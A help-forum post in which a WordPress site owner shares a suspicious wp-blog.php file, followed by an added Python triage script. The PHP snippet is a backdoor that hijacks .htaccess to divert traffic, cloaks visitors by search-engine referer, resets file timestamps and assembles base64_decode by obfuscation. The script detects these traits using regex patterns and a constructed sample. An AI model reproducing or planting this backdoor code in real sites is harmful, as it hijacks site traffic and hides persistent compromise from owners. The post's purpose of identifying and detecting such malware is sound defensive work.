I noticed a strange file in my managed WordPress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:
@ini_set('display_errors', '0');   // hide every PHP error from the HTTP response
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
    // A request carrying ?check= overwrites the site's .htaccess so that every
    // *.html URL is routed into this file (wp-blog.php) instead of WordPress.
    $htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress';
    if (file_put_contents('.htaccess', $htaccess)) {
        // $actime is not defined in this snippet; touch() resets the modification
        // times so the files do not stand out as recently changed.
        touch('.htaccess', $actime);
        touch('wp-blog.php', $actime);
        echo 'ok';
    }
    exit;
}
// Storage location: a fake directory hidden inside wp-includes, or a fallback under uploads.
if (is_dir("wp-includes/Text/Diff/p")) {
    $dir = "wp-includes/Text/Diff/p";
} else {
    $dir = "wp-content/uploads/wp";
}
$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
$redirect = 0;
$fof = '404 not found';
function getRealIpAddr() {
    // Trusts client-supplied proxy headers, so the "IP" is whatever the visitor claims.
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];
// Cloaking: visitors who arrive from a search engine are flagged for different treatment.
if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
// Obfuscation: the string 'base64_decode' is assembled piece by piece so the
// function name never appears literally in the file.
$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);   // 'basesx_'
$ao = 'wp_ccd';
$ee = $ea.$ae;                           // 'basesx_decode'
$oa = str_replace('sx', '64', $ee);      // 'base64_decode'
$genpass = "xxx+xxx";
$tdpass = "xxxx";
if (ini_get('allow_url_fopen')) {
    // Fetches arbitrary remote content when the server allows URL wrappers.
    function get_data_ya($mmm) {
        $data = file_get_contents($mmm);
        return $data;
    }
}
There’s more, but this part looks like it’s doing something suspicious.
I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.
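As an added example (not from the post, WordPress, or any security product), the following Python triage script turns the tell-tale shapes in that snippet into checks a site owner can run over a WordPress tree: error suppression, a function name assembled with str_replace, search-engine referer cloaking, .htaccess rewriting, and timestamp resetting, plus a check for RewriteRule lines that divert traffic into a PHP file and for PHP files sitting under wp-content/uploads. The indicator patterns and the sample inputs are constructed for this example and are deliberately narrow; they are hypothetical, not a complete scanner.

```python
import re
from pathlib import Path
# Indicator patterns derived from the wp-blog.php snippet in the post (hypothetical scanner, not a full tool).
INDICATORS = {
    "error_suppression": re.compile(r"error_reporting\(\s*0\s*\)"),
    "assembled_callable": re.compile(r"str_replace\(\s*['\"]\w*['\"]\s*,\s*['\"](?:bas|64|decode)['\"]"),
    "search_engine_cloaking": re.compile(r"preg_match\(\s*['\"]/[^'\"]*google\|bing\|yandex", re.I),
    "htaccess_rewrite": re.compile(r"file_put_contents\(\s*['\"]\.htaccess['\"]"),
    "timestomp": re.compile(r"\btouch\(\s*['\"][^'\"]+['\"]\s*,\s*\$"),
    "remote_fetch": re.compile(r"allow_url_fopen|file_get_contents\(\s*\$"),
}
def score_php(source: str) -> dict:
    """Map each indicator name to whether it matches the given PHP source."""
    return {name: bool(pat.search(source)) for name, pat in INDICATORS.items()}

def is_suspicious(source: str, threshold: int = 3) -> bool:
    """Any one indicator is weak on its own; several together are a strong signal."""
    return sum(score_php(source).values()) >= threshold

def rogue_rewrites(htaccess: str) -> list:
    """RewriteRule lines that send requests to a PHP file other than index.php."""
    hits = []
    for line in htaccess.splitlines():
        m = re.match(r"\s*RewriteRule\s+\S+\s+(\S+)", line)
        if not m:
            continue
        target = m.group(1).split("?")[0].lstrip("/")
        if target.endswith(".php") and target != "index.php":
            hits.append(line.strip())
    return hits

def php_in_uploads(root) -> list:
    """PHP files under wp-content/uploads; that tree should hold media only."""
    uploads = Path(root) / "wp-content" / "uploads"
    if not uploads.is_dir():
        return []
    return sorted(str(p.relative_to(root)) for p in uploads.rglob("*.php"))

# Constructed sample reproducing the shapes seen in the post, not the real file.
SAMPLE_PHP = """<?php
error_reporting(0);
$ea = str_replace('_sha', 'bas', '_shaesx_');
if (preg_match("/google|bing|yandex/i", $ref)) $redirect = 1;
if (file_put_contents('.htaccess', $htaccess)) { touch('.htaccess', $actime); }
"""
SAMPLE_HTACCESS = """RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\\.php$ - [L]
RewriteRule . /index.php [L]
"""
```

Run score_php over each .php file in the install and rogue_rewrites over every .htaccess; a file that trips several indicators, or a rewrite that targets anything but index.php, is worth comparing against a clean copy of WordPress.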